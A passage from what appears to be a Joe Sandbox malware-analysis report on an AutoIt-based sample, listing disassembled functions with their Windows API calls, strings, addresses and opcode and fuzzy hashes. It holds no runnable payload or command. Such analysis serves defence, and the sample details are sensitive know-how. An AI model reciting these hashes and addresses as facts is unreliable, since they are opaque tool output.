                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: 3ab066df9c90e505fb19c034eaaf2ce1ca0fe52e4c193d766f2c549caece9b83
                                                                            • Instruction ID: 7185f64494e340c437ac969046917cbbcb7b40456aa8c1b5a04ce9df62879ad3
                                                                            • Opcode Fuzzy Hash: 3ab066df9c90e505fb19c034eaaf2ce1ca0fe52e4c193d766f2c549caece9b83
                                                                            • Instruction Fuzzy Hash: F5E046B1500308EFDB026F70DC48A6D7BADFB4C390F118849F95A8B2A0EB7898408B40
                                                                            Function 0033DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 0033DEAA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ContainedObject
                                                                            • String ID: AutoIt3GUI$Container
                                                                            • API String ID: 3565006973-3941886329
                                                                            • Opcode ID: 6bcf9d81041f052c5ffe2b787e5cb36cad30b7df8d1bf043205728879b15b959
                                                                            • Instruction ID: fcb414f5807a12fc97d220afbc116fa2bd9f39b1b8df26832540b0b55ff4e873
                                                                            • Opcode Fuzzy Hash: 6bcf9d81041f052c5ffe2b787e5cb36cad30b7df8d1bf043205728879b15b959
                                                                            • Instruction Fuzzy Hash: 46915574600201AFDB16DF64D884A6ABBB9BF48714F20896DF90ACF691DB70E840CB60
                                                                            Function 0034290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy
                                                                            • String ID: I/7$I/7
                                                                            • API String ID: 3048848545-1404973029
                                                                            • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                            • Instruction ID: 28e05e610f2c6a7c432e53578f68df8c26163b27f20aa691e75f097ff7a024f9
                                                                            • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                            • Instruction Fuzzy Hash: F141B231900216AACF26DF98D451AFEB7F0EF49710F95505AF881BF191DB30AE92C7A4
                                                                            Function 0031BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 0031BCDA
                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 0031BCF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemorySleepStatus
                                                                            • String ID: @
                                                                            • API String ID: 2783356886-2766056989
                                                                            • Opcode ID: 0ac7009a94cb30c2696fe8f61f3cb48980d58e484af11380d924c343b4c9f684
                                                                            • Instruction ID: db4bf575ae300de8b12660ee9589c4d49c365a87e9edd22df12b8f026f8f86af
                                                                            • Opcode Fuzzy Hash: 0ac7009a94cb30c2696fe8f61f3cb48980d58e484af11380d924c343b4c9f684
                                                                            • Instruction Fuzzy Hash: B15125714087489BE321AF14DC86BAFBBECFF98354F414C4EF2C8450A6DB7085A98796
                                                                            Function 0034C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 003044ED: __fread_nolock.LIBCMT ref: 0030450B
                                                                            • _wcscmp.LIBCMT ref: 0034C65D
                                                                            • _wcscmp.LIBCMT ref: 0034C670
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp$__fread_nolock
                                                                            • String ID: FILE
                                                                            • API String ID: 4029003684-3121273764
                                                                            • Opcode ID: ee53289a3f006a7df1c71f561f282d77c53cfe023cd1d51591a4efe92e79f2ef
                                                                            • Instruction ID: 257602538ae54980a99b1f3a4be8b9b0d6372ccb93913e9dbe02e2e744a0498a
                                                                            • Opcode Fuzzy Hash: ee53289a3f006a7df1c71f561f282d77c53cfe023cd1d51591a4efe92e79f2ef
                                                                            • Instruction Fuzzy Hash: 0041F472A0021ABBDF229AA5DC41FEF77F9AF49704F014069F605EF181D774AA04CB60
                                                                            Function 0036A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0036A85A
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0036A86F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '
                                                                            • API String ID: 3850602802-1997036262
                                                                            • Opcode ID: 27ec99e9dbf0f62187e23393e5f65dbec928e2f8283cd92269bdae876e8b1edf
                                                                            • Instruction ID: 9d331a17c066cf4913fe91f3ac3630e4aee39f86a21a8db06e4eb5f1bb409fec
                                                                            • Opcode Fuzzy Hash: 27ec99e9dbf0f62187e23393e5f65dbec928e2f8283cd92269bdae876e8b1edf
                                                                            • Instruction Fuzzy Hash: 57410774A017099FDB15CFA8C880BDABBB9FB09300F11416AE905EB385D770A951DFA1
                                                                            Function 0036975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 0036980E
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0036984A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$DestroyMove
                                                                            • String ID: static
                                                                            • API String ID: 2139405536-2160076837
                                                                            • Opcode ID: 67d0368da3eaf714a9ae76020acc8d88c70abb71b49adfc04c118add0987b12b
                                                                            • Instruction ID: 0b9bff5d94a78cdd1aaed8f2cda7f79171f109997e693214c1cdeed8b4ada693
                                                                            • Opcode Fuzzy Hash: 67d0368da3eaf714a9ae76020acc8d88c70abb71b49adfc04c118add0987b12b
                                                                            • Instruction Fuzzy Hash: 4C318B71110604AAEB129F34CC80BFB77ADFF99764F11861AF9A9C7190DA30AC81C760
                                                                            Function 00345157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 003451C6
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00345201
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
                                                                            • Opcode ID: 233be020d7ecc6a6bde44da1dcf9322d0275500ba4a199559c38f3b42921f68c
                                                                            • Instruction ID: 46fd216692a811548fe622f16d90fafee232c3a628fcc703f5c2a314ddeaa8a8
                                                                            • Opcode Fuzzy Hash: 233be020d7ecc6a6bde44da1dcf9322d0275500ba4a199559c38f3b42921f68c
                                                                            • Instruction Fuzzy Hash: A731E931D007089FDB26CF99D845B9EBBF8FF45350F15481AE981EE1A2D7B0A944CB10
                                                                            Function 0035658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __snwprintf
                                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                                            • API String ID: 2391506597-2584243854
                                                                            • Opcode ID: 27f4d26f58f8e90de010b2fa68bd7ecc309b2d9fa0b068aca63dc65008cf9ed7
                                                                            • Instruction ID: 01b29d9bae225b8ed3aef3a2eddf164f91adcc05d4ffc5b7765da3b853971a87
                                                                            • Opcode Fuzzy Hash: 27f4d26f58f8e90de010b2fa68bd7ecc309b2d9fa0b068aca63dc65008cf9ed7
                                                                            • Instruction Fuzzy Hash: 17218071A01228AFCF16EFA4C892EEE77B4AF45704F400459F905AF191DB70EE49CBA5
                                                                            Function 003693CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0036945C
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00369467
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Combobox
                                                                            • API String ID: 3850602802-2096851135
                                                                            • Opcode ID: 8181ee7d4be327735fcc27c0cf046b3366f649881cb14145d49aba7cb3f20398
                                                                            • Instruction ID: 2c94cd4dd866fefcf0fed472fa91e238996865f7a7a2bc67255ee8e3d3e6c1e9
                                                                            • Opcode Fuzzy Hash: 8181ee7d4be327735fcc27c0cf046b3366f649881cb14145d49aba7cb3f20398
                                                                            • Instruction Fuzzy Hash: 77119071200208AFEF13DF55DC80FBB376EEB483A4F118126F9189B294DA319C529760
                                                                            Function 0036DA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
                                                                            • GetActiveWindow.USER32 ref: 0036DA7B
                                                                            • EnumChildWindows.USER32(?,0036D75F,00000000), ref: 0036DAF5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ActiveChildEnumLongWindows
                                                                            • String ID: T15
                                                                            • API String ID: 3814560230-68852975
                                                                            • Opcode ID: 54d3844aa44fcd86fa1e64eed466a9d4b7ca411f6161a0ee6e525644ae205235
                                                                            • Instruction ID: 6f5d39ff93d81b4047b7b030b4dd9c26572763e5768ac1accbf92f2518cf2367
                                                                            • Opcode Fuzzy Hash: 54d3844aa44fcd86fa1e64eed466a9d4b7ca411f6161a0ee6e525644ae205235
                                                                            • Instruction Fuzzy Hash: 2E216B39604200DFC716DF28D850AA6B3E9EB4A320F25461DF86AC73E5D730B860DB64
                                                                            Function 003698FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0031D1BA
                                                                              • Part of subcall function 0031D17C: GetStockObject.GDI32(00000011), ref: 0031D1CE
                                                                              • Part of subcall function 0031D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0031D1D8
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00369968
                                                                            • GetSysColor.USER32(00000012), ref: 00369982
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                            • String ID: static
                                                                            • API String ID: 1983116058-2160076837
                                                                            • Opcode ID: cb4a9b88cdfd6d7f741641e2450cf52f8b66c9da92cff7ad8d64ee46d0a1825c
                                                                            • Instruction ID: 500e178efb9d297bb9ccdf74a08271ac66f217bd97ad9fe582f051474e502b3d
                                                                            • Opcode Fuzzy Hash: cb4a9b88cdfd6d7f741641e2450cf52f8b66c9da92cff7ad8d64ee46d0a1825c
                                                                            • Instruction Fuzzy Hash: 6C112672520209AFDB06DFB8CC45AFA7BACFB09354F054A29F955E2250E734E850DB60
                                                                            Function 00369617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00369699
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003696A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: LengthMessageSendTextWindow
                                                                            • String ID: edit
                                                                            • API String ID: 2978978980-2167791130
                                                                            • Opcode ID: a28cd8de7afe39ddd6efb14636510b6248231557349e040610cbf2d507186d99
                                                                            • Instruction ID: a574f244113dca70f557af474acf787c101f72a320c824da5016c04d34c6a488
                                                                            • Opcode Fuzzy Hash: a28cd8de7afe39ddd6efb14636510b6248231557349e040610cbf2d507186d99
                                                                            • Instruction Fuzzy Hash: 56116A71100208AAEF125F64DC40FEB3B6EEB09378F518716F965971E8C735DC50A760
                                                                            Function 00345262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 003452D5
                                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003452F4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
                                                                            • Opcode ID: 8818ec59f3db5840888b708740ee4f9899ce6568eaea483b77f418e981a07d75
                                                                            • Instruction ID: 69e6001d6cd48bd9582fd5b3bbbbdecb7f4052fa0dc76c1d14de501611de1b7f
                                                                            • Opcode Fuzzy Hash: 8818ec59f3db5840888b708740ee4f9899ce6568eaea483b77f418e981a07d75
                                                                            • Instruction Fuzzy Hash: 0511D07AD01614ABDB22DF98DD04F9A77F8AB06B50F060026E981EF296D7B0FD04C790
                                                                            Function 00354D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00354DF5
                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00354E1E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$OpenOption
                                                                            • String ID: <local>
                                                                            • API String ID: 942729171-4266983199
                                                                            • Opcode ID: cd6f50576b298b043cdf1d531015088b38de69a8023371023abad6005aea4ba3
                                                                            • Instruction ID: a87052edcfe3f8c8e7748452f6ebad9d517d7202c0a656677225809425a4a2dd
                                                                            • Opcode Fuzzy Hash: cd6f50576b298b043cdf1d531015088b38de69a8023371023abad6005aea4ba3
                                                                            • Instruction Fuzzy Hash: 0F119E70501221BADB2A8F51CC89EFBFBACFB0675AF10822AF90556550D2705988D6E0
                                                                            Function 0032A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003337A7
                                                                            • ___raise_securityfailure.LIBCMT ref: 0033388E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                            • String ID: (<
                                                                            • API String ID: 3761405300-1407110272
                                                                            • Opcode ID: 4b11fc49202428a8136e5c67e296da0d7f4321af6ee33ff0723ee7bc5cd60374
                                                                            • Instruction ID: 2c9d733296fa2f846797fdd7997145e89d341a02e644efdee2e9a94f91578cfe
                                                                            • Opcode Fuzzy Hash: 4b11fc49202428a8136e5c67e296da0d7f4321af6ee33ff0723ee7bc5cd60374
                                                                            • Instruction Fuzzy Hash: E221F5B5580A84DBD70ADF75FA95E407BB8BB48314F10982AE505CB3A1E3F1B980CF45
                                                                            Function 0035A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0035A84E
                                                                            • htons.WSOCK32(00000000,?,00000000), ref: 0035A88B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: htonsinet_addr
                                                                            • String ID: 255.255.255.255
                                                                            • API String ID: 3832099526-2422070025
                                                                            • Opcode ID: ca33de2dad768f6a6c43df1dbcb70c71a18f74a585518780d7ce8bd6422988b2
                                                                            • Instruction ID: aad38cdd50e8d2d0a2cb22ae4229aa2296e07bdcdedeb6fa581d8f40ce15e702
                                                                            • Opcode Fuzzy Hash: ca33de2dad768f6a6c43df1dbcb70c71a18f74a585518780d7ce8bd6422988b2
